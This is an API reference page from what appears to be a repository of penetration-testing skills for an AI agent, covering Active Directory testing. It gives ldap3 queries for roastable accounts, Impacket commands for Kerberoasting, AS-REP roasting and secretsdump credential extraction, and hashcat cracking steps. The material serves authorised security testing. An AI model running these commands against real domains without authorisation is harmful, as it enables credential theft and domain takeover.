Files
Anthropic-Cybersecurity-Skills/skills/performing-active-directory-penetration-test/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

85 lines
2.3 KiB
Markdown

# Active Directory Penetration Test - API Reference
## ldap3 Library
### Connection
```python
from ldap3 import Server, Connection, ALL, SUBTREE
server = Server("ldaps://dc.example.com", get_info=ALL, use_ssl=True)
conn = Connection(server, user="DOMAIN\\user", password="pass", auto_bind=True)
```
### Key LDAP Queries
| Purpose | Filter |
|---------|--------|
| All users | `(&(objectClass=user)(objectCategory=person))` |
| Users with SPNs | `(&(objectClass=user)(servicePrincipalName=*))` |
| AS-REP Roastable | `(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))` |
| Domain admins | `(&(objectClass=group)(cn=Domain Admins))` |
| Password policy | `(objectClass=domain)` |
### UserAccountControl Flags
| Flag | Hex | Test |
|------|-----|------|
| ACCOUNTDISABLE | 0x0002 | Account disabled |
| PASSWD_NOTREQD | 0x0020 | No password required |
| DONT_EXPIRE_PASSWORD | 0x10000 | Password never expires |
| DONT_REQ_PREAUTH | 0x400000 | No Kerberos pre-auth |
## Impacket Tools
### GetUserSPNs (Kerberoasting)
```bash
python3 -m impacket.examples.GetUserSPNs DOMAIN/user:pass -dc-ip 10.0.0.1 -request
```
### GetNPUsers (AS-REP Roasting)
```bash
python3 -m impacket.examples.GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip 10.0.0.1
```
### secretsdump (Credential Extraction)
```bash
python3 -m impacket.examples.secretsdump DOMAIN/admin:pass@10.0.0.1
```
## Attack Techniques
### Kerberoasting
1. Enumerate users with SPNs via LDAP
2. Request TGS tickets for those SPNs
3. Extract ticket hashes
4. Crack offline with hashcat (mode 13100)
### AS-REP Roasting
1. Find accounts with pre-auth disabled
2. Request AS-REP without authentication
3. Extract encrypted part of AS-REP
4. Crack offline with hashcat (mode 18200)
### Password Policy Weaknesses
- Min length < 12 characters
- No account lockout threshold
- No password history enforcement
- Password never expires on service accounts
## Output Schema
```json
{
"report": "ad_penetration_test",
"domain_info": {"default_naming_context": "DC=example,DC=com"},
"total_users": 500,
"total_findings": 12,
"severity_summary": {"critical": 1, "high": 8, "medium": 3}
}
```
## CLI Usage
```bash
python agent.py --server ldaps://dc.example.com --username "DOMAIN\\user" --password "pass" --output report.json
```